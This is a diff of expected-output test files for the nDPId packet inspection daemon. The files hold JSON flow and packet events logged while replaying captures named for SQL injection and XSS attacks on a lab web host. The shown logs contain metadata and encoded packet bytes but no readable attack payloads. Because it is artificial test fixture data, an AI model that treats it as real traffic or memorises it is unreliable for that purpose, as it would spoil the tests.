+00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499348413192,"flow_last_seen":1499348418262,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1840,"flow_tot_l4_payload_len":2300,"flow_avg_l4_payload_len":230,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36198,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499348422024,"flow_last_seen":1499348427063,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1881,"flow_tot_l4_payload_len":2418,"flow_avg_l4_payload_len":241,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36200,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1499348433464,"flow_last_seen":1499348438551,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":4149,"flow_tot_l4_payload_len":4749,"flow_avg_l4_payload_len":431,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36202,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499348467295,"flow_last_seen":1499348472302,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2021,"flow_tot_l4_payload_len":2620,"flow_avg_l4_payload_len":262,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36204,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00808{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499348480992,"flow_last_seen":1499348486002,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":530,"flow_tot_l4_payload_len":1053,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36206,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499348494345,"flow_last_seen":1499348499355,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1840,"flow_tot_l4_payload_len":2376,"flow_avg_l4_payload_len":237,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36208,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499348506489,"flow_last_seen":1499348511497,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1881,"flow_tot_l4_payload_len":2418,"flow_avg_l4_payload_len":241,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36210,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1499348514064,"flow_last_seen":1499348519077,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2701,"flow_tot_l4_payload_len":4749,"flow_avg_l4_payload_len":395,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36212,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00562{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","packets-captured":94,"packets-processed":94,"total-skipped-flows":0,"total-l4-data-len":23660,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":9,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":9,"total-idle-flows":9,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":57,"global_ts_msec":1499348519077} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 94/94 diff --git a/test/results/WebattackXSS.pcap.out b/test/results/WebattackXSS.pcap.out index c7fde0b79..c7188f901 100644 --- a/test/results/WebattackXSS.pcap.out +++ b/test/results/WebattackXSS.pcap.out @@ -1,3972 +1,3972 @@ 00463{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"WebattackXSS.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00549{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"WebattackXSS.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1499346935283} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346935283,"flow_last_seen":1499346935283,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346935283,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52098,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1499346935283,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346935283,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8wadAAD4GBCmsEAABwKgKMsuCAFAodgngAAAAAKACchCXWwAAAgQFtAQCCAoBOMhHAAAAAAEDAwc="} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1499346935283,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346935283,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQy4I5j3VaKHYJ4aAScSBLsAAAAgQFtAQCCAoD4pm+ATjIRwEDAwc="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1499346935285,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346935285,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0wahAAD4GBDCsEAABwKgKMsuCAFAodgnhOY91W4AQAOXqtwAAAQEICgE4yEcD4pm+"} -00968{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499346935283,"flow_last_seen":1499346935285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":1499346935285,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52098,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346935343,"flow_last_seen":1499346935343,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346935343,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52100,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1499346935343,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346935343,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8IaBAAD4GpDCsEAABwKgKMsuEAFAW1en2AAAAAKACchDI1AAAAgQFtAQCCAoBOMhWAAAAAAEDAwc="} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1499346935343,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346935343,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQy4Rgmy17FtXp96AScSCd7QAAAgQFtAQCCAoD4pnNATjIVgEDAwc="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1499346935343,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346935343,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0IaFAAD4GpDesEAABwKgKMsuEAFAW1en3YJstfIAQAOU89QAAAQEICgE4yFYD4pnN"} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346935650,"flow_last_seen":1499346935650,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346935650,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52118,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1499346935650,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346935650,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ZwtAAD4GXsWsEAABwKgKMsuWAFCoJa+oAAAAAKACchBxcwAAAgQFtAQCCAoBOMijAAAAAAEDAwc="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346935650,"flow_last_seen":1499346935650,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346935650,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52120,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1499346935650,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346935650,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8\/9xAAD4GxfOsEAABwKgKMsuYAFCG7Dd\/AAAAAKACchAK1AAAAgQFtAQCCAoBOMijAAAAAAEDAwc="} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1499346935650,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346935650,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQy5YT3KepqCWvqaAScSAY0AAAAgQFtAQCCAoD4poaATjIowEDAwc="} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1499346935650,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346935650,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQy5hHE6nghuw3gKAScSB8wgAAAgQFtAQCCAoD4poaATjIowEDAwc="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1499346935651,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346935651,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ZwxAAD4GXsysEAABwKgKMsuWAFCoJa+pE9ynqoAQAOW31wAAAQEICgE4yKMD4poa"} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1499346935651,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346935651,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0\/91AAD4GxfqsEAABwKgKMsuYAFCG7DeARxOp4YAQAOUbygAAAQEICgE4yKMD4poa"} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":49,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346956870,"flow_last_seen":1499346956870,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346956870,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52200,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1499346956870,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346956870,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8DqpAAD4GtyasEAABwKgKMsvoAFDxddP2AAAAAKACchDuyQAAAgQFtAQCCAoBON1cAAAAAAEDAwc="} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1499346956870,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346956870,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQy+g57n8P8XXT96AScSCD9QAAAgQFtAQCCAoD4q7TATjdXAEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1499346956871,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346956871,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0DqtAAD4Gty2sEAABwKgKMsvoAFDxddP3Oe5\/EIAQAOUi\/QAAAQEICgE43VwD4q7T"} -00969{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499346956870,"flow_last_seen":1499346956871,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":1499346956871,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52200,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":61,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346956932,"flow_last_seen":1499346956932,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346956932,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52202,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1499346956932,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346956932,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8nj9AAD4GJ5GsEAABwKgKMsvqAFAHDkNUAAAAAKACchBpwwAAAgQFtAQCCAoBON1rAAAAAAEDAwc="} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1499346956932,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346956932,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQy+qiErzRBw5DVaAScSBY+QAAAgQFtAQCCAoD4q7iATjdawEDAwc="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1499346956933,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346956933,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0nkBAAD4GJ5isEAABwKgKMsvqAFAHDkNVohK80oAQAOX4AAAAAQEICgE43WsD4q7i"} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":76,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346957283,"flow_last_seen":1499346957283,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346957283,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52220,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1499346957283,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346957283,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8F6tAAD4GriWsEAABwKgKMsv8AFD6EcpoAAAAAKACchDvQAAAAgQFtAQCCAoBON3DAAAAAAEDAwc="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":77,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346957283,"flow_last_seen":1499346957283,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346957283,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52222,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1499346957283,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346957283,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8iOxAAD4GPOSsEAABwKgKMsv+AFCTelUvAAAAAKACchDLDwAAAgQFtAQCCAoBON3DAAAAAAEDAwc="} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1499346957283,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346957283,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQy\/xzRrv9+hHKaaAScSANvwAAAgQFtAQCCAoD4q86ATjdwwEDAwc="} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1499346957283,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346957283,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQy\/7+F1DJk3pVMKAScSDJ8AAAAgQFtAQCCAoD4q86ATjdwwEDAwc="} 